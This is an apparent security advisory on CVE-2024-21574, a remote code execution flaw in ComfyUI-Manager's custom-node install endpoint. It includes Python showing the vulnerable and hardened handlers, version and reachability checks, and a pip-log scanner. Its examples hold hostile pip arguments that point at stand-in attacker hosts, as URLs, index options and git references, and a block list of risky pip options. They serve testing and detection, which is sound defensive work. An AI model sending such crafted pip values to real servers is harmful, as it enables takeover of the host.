Platform
python
Component
comfyui-manager
Fixed version
2.51.1
CVE-2024-21574 is a remote code execution (RCE) vulnerability in ComfyUI-Manager, the Python custom-node manager for ComfyUI. The /customnode/install endpoint, which installs custom nodes, accepts a POST body whose 'pip' field lists the packages to install. Versions before 2.51.1 do not validate that field, so a requester can make the server run pip install on a package, URL or pip option of their choosing; pip then fetches and executes attacker-controlled code (a source distribution's build step, or a package the node later imports) with the privileges of the ComfyUI process. ComfyUI's web server does not authenticate requests by default, so anyone who can reach the listening port can call the endpoint. Version 2.51.1 fixes the issue.
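To make the bug class concrete, here is an added example constructed for this page (it is not ComfyUI-Manager's own code) that models the handler in two forms: the vulnerable pattern, in which the request's 'pip' list becomes pip's argument list unchanged, and a hardened version that accepts only bare PEP 508-style requirements whose normalized names are on an allowlist the operator supplies. The request shape, the function names and the allowlist are assumptions made for the example; the pip command is built but never executed.

```python
import re
import sys

# Added example, not ComfyUI-Manager's code. Models the pattern behind
# CVE-2024-21574: a JSON body for POST /customnode/install carries a "pip"
# list, and the vulnerable handler passes it straight to `pip install`.

# PEP 508 project name: alphanumerics, with ., _ or - allowed only inside.
PACKAGE_NAME = r"[A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?"
VERSION_CLAUSE = r"(?:===|==|!=|<=|>=|~=|<|>)\s*[A-Za-z0-9.*+!-]+"
# A "bare" requirement: name, optional [extras], optional version clauses.
# URLs, "name @ url", git+..., local paths, markers and options do not match.
SAFE_REQUIREMENT = re.compile(
    rf"^{PACKAGE_NAME}(?:\[[A-Za-z0-9._,-]+\])?"
    rf"(?:\s*{VERSION_CLAUSE}(?:\s*,\s*{VERSION_CLAUSE})*)?$"
)


def normalize_name(name: str) -> str:
    """PEP 503 normalization so 'Pillow', 'pillow' and 'PILLOW' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def build_pip_command_vulnerable(request_body: dict) -> list[str]:
    """Vulnerable pattern: whatever the request put in "pip" becomes pip's argv.

    'https://attacker.example/x.tar.gz', 'git+https://...', './some/dir' or
    '--index-url=https://attacker.example/simple' all reach pip unchanged.
    """
    return [sys.executable, "-m", "pip", "install", *request_body.get("pip", [])]


def validate_pip_field(pip_field: object, allowlist: set[str]) -> list[str]:
    """Return the cleaned requirement strings, or raise ValueError."""
    if not isinstance(pip_field, list):
        raise ValueError("pip field must be a list of requirement strings")
    cleaned = []
    for entry in pip_field:
        if not isinstance(entry, str):
            raise ValueError(f"non-string entry: {entry!r}")
        entry = entry.strip()
        if entry.startswith("-"):
            raise ValueError(f"pip options are not allowed: {entry}")
        if not SAFE_REQUIREMENT.fullmatch(entry):
            raise ValueError(f"not a bare requirement: {entry}")
        name = re.match(PACKAGE_NAME, entry).group(0)
        if normalize_name(name) not in allowlist:
            raise ValueError(f"package not in allowlist: {name}")
        cleaned.append(entry)
    return cleaned


def build_pip_command_hardened(request_body: dict, allowlist: set[str]) -> list[str]:
    """Hardened handler: validated names only, and wheels only.

    --only-binary=:all: makes pip refuse source distributions, so no build
    script runs at install time. Rejecting sdists is a trade-off chosen here
    (assumed acceptable for the example), not something the project does.
    """
    reqs = validate_pip_field(request_body.get("pip", []), allowlist)
    return [sys.executable, "-m", "pip", "install", "--only-binary=:all:", *reqs]


def is_rejected(pip_field: object, allowlist: set[str]) -> bool:
    """True when the hardened validator refuses the field."""
    try:
        validate_pip_field(pip_field, allowlist)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Allowlist assumed to come from the node's vetted requirements.
    allow = {normalize_name(n) for n in ["requests", "numpy", "Pillow"]}
    print(build_pip_command_hardened({"pip": ["requests==2.31.0", "Pillow"]}, allow))
    for bad in (["https://evil.example/pkg.tar.gz"],
                ["--index-url=https://evil.example/simple", "requests"],
                ["git+https://evil.example/repo.git"],
                ["requests", "not-allowed-pkg"]):
        print(bad, "->", "rejected" if is_rejected(bad, allow) else "accepted")
```

The allowlist matters as much as the syntax check: a syntactically clean name can still point at a typosquatted or attacker-published package on the default index, so the hardened handler only installs what the operator has vetted.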
The impact of CVE-2024-21574 is severe. Code installed through pip runs as the ComfyUI process, so a successful attacker gains everything that process can do: run commands, install persistent malware, read model files, workflows and any credentials on the host, and pivot to other systems on the network. No compromised repository is required, because pip will install from any URL the attacker hosts, and a source distribution can execute arbitrary code during its build. Since ComfyUI-Manager sits inside AI workflows, the attacker can also tamper with models and generated outputs or run models of their choosing. The missing input validation is the direct enabler of the RCE, which makes this a high-priority issue.
CVE-2024-21574 was publicly disclosed on December 12, 2024. The vulnerability's simplicity and pip's ubiquity make it a likely target. No public proof-of-concept (PoC) has been widely reported, but an exploit is little more than a POST with a crafted 'pip' list, so one could appear quickly. The EPSS score listed for this CVE is 7.10% (91st percentile). It is not currently listed in the CISA KEV catalog.
Organizations and individuals running ComfyUI-Manager in AI workflows are at significant risk, particularly where the instance is reachable from untrusted networks or custom nodes are installed from untrusted sources. Shared instances serving several users are especially exposed: a single install request from one user, or from anyone who can reach the endpoint, compromises the whole server.
• linux / server:
# Replace comfyui-manager with the systemd unit that runs ComfyUI: the Manager
# serves its endpoints from inside the ComfyUI process, not as its own service.
# Review every install it logs, not only the failed ones.
journalctl -u comfyui-manager -g 'pip install'
• python / supply-chain:
import subprocess

# Report the installed comfyui-manager version. Empty output means it was not
# installed through pip; check the checkout under custom_nodes instead.
result = subprocess.run(['pip', 'show', 'comfyui-manager'], capture_output=True, text=True)
print(result.stdout)
• generic web:
# A GET on a POST-only route returns 405 rather than 404 when the route exists,
# so anything other than 404 means the install endpoint is reachable from here.
curl -s -o /dev/null -w '%{http_code}\n' http://<comfyui_manager_ip>/customnode/install
disclosure
Exploitation status
EPSS
7.10% (91st percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2024-21574 is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately feasible because of compatibility concerns, reduce exposure in the meantime. ComfyUI-Manager's endpoints are served by ComfyUI's own web server, which does not authenticate requests by default, so keep ComfyUI bound to localhost (the default unless it was started with --listen) or put an authenticating reverse proxy in front of it and deny /customnode/install to everything except trusted sources. A Web Application Firewall (WAF) rule that blocks request bodies whose 'pip' entries contain URLs, VCS references, local paths or pip options is a useful stopgap. Review every custom node before installing it, and log the pip commands the server runs. A direct detection signature is hard to write without deeper analysis of the install path, so monitor instead for pip installs of unexpected packages, installs from URLs or non-default indexes, and unexpected child processes of the ComfyUI process.
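The monitoring advice above can be turned into a small scan. The following is an added example written for this page, not ComfyUI-Manager's code; the log lines are constructed, in a hypothetical format where the server records each pip command it runs for a custom-node install, and the indicator list reflects the attack surface described here (pip options that change the package source, direct URLs, VCS references and local paths).

```python
import re
import shlex
from typing import Optional

# Constructed sample log (hypothetical format; not ComfyUI's real log output).
SAMPLE_LOG = """\
2024-12-13T09:58:01Z comfyui[4120]: running: pip install requests==2.31.0
2024-12-13T10:02:17Z comfyui[4120]: running: pip install --index-url https://pkgs.attacker.example/simple totally-fine
2024-12-13T10:03:44Z comfyui[4120]: running: pip install https://files.attacker.example/helper-1.0.tar.gz
2024-12-13T10:05:09Z comfyui[4120]: running: pip install git+https://github.example/x/y.git
2024-12-13T10:06:30Z comfyui[4120]: running: pip install numpy>=1.26,<2
2024-12-13T10:07:55Z comfyui[4120]: running: pip install ./custom_nodes/foo/vendor
"""

# Everything after "pip install" on a line (also matches "python -m pip install").
PIP_INSTALL = re.compile(r"pip3?\s+install\s+(.*)$")

# pip options that change where packages come from or how the source is trusted.
RISKY_OPTIONS = {
    "-i", "--index-url", "--extra-index-url", "-f", "--find-links",
    "--trusted-host", "--no-index", "-e", "--editable",
}


def classify_token(tok: str) -> Optional[str]:
    """Return a reason string if a single pip argument is suspicious, else None."""
    if tok.startswith("-"):
        opt = tok.split("=", 1)[0]          # "--index-url=https://x" -> "--index-url"
        return f"option {opt}" if opt in RISKY_OPTIONS else None
    if re.match(r"^(git|hg|svn|bzr)\+", tok):
        return "VCS reference"
    if "://" in tok:
        return "direct URL"
    if tok.startswith(("./", "../", "/", "~")) or tok.endswith((".whl", ".tar.gz", ".zip")):
        return "local path or archive"
    return None


def suspicious_pip_commands(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan log lines for pip install commands; return (line, reasons) for each
    command that carries at least one suspicious argument."""
    hits = []
    for line in log_text.splitlines():
        m = PIP_INSTALL.search(line)
        if not m:
            continue
        try:
            args = shlex.split(m.group(1))
        except ValueError:                  # unbalanced quotes: still worth a look
            hits.append((line, ["unparseable arguments"]))
            continue
        reasons = [r for r in (classify_token(a) for a in args) if r]
        if reasons:
            hits.append((line, reasons))
    return hits


if __name__ == "__main__":
    for line, reasons in suspicious_pip_commands(SAMPLE_LOG):
        print(", ".join(reasons), "<-", line)
```

Plain pinned requirements such as requests==2.31.0 and numpy>=1.26,<2 pass through silently; the four lines that fetch from an attacker-chosen index, a direct URL, a VCS repository or a local path are reported with the reason. Feed the same function the output of the journalctl command above to apply it to a real host.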
Update ComfyUI-Manager to version 2.51.1 or later. That release fixes the remote code execution vulnerability by properly validating the 'pip' field of the POST request to the /customnode/install endpoint. To update, use the Python package manager (pip) or follow the plugin developer's instructions.
CVE-2024-21574 is a critical remote code execution vulnerability in ComfyUI-Manager versions before 2.51.1. It lets an attacker execute arbitrary code on the server because the 'pip' field of requests to the /customnode/install endpoint is not validated before being passed to pip install.
You are affected if you run any ComfyUI-Manager version before 2.51.1. Upgrade to version 2.51.1 or later immediately.
The recommended fix is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately possible, keep the ComfyUI server off untrusted networks, restrict access to the /customnode/install endpoint and add WAF rules for the 'pip' field.
While no widespread exploitation has been confirmed, the vulnerability's ease of exploitation suggests it is a likely target. Monitor your systems closely for suspicious activity.
Refer to the ComfyUI-Manager project's official repository and release notes for the latest information and security advisories.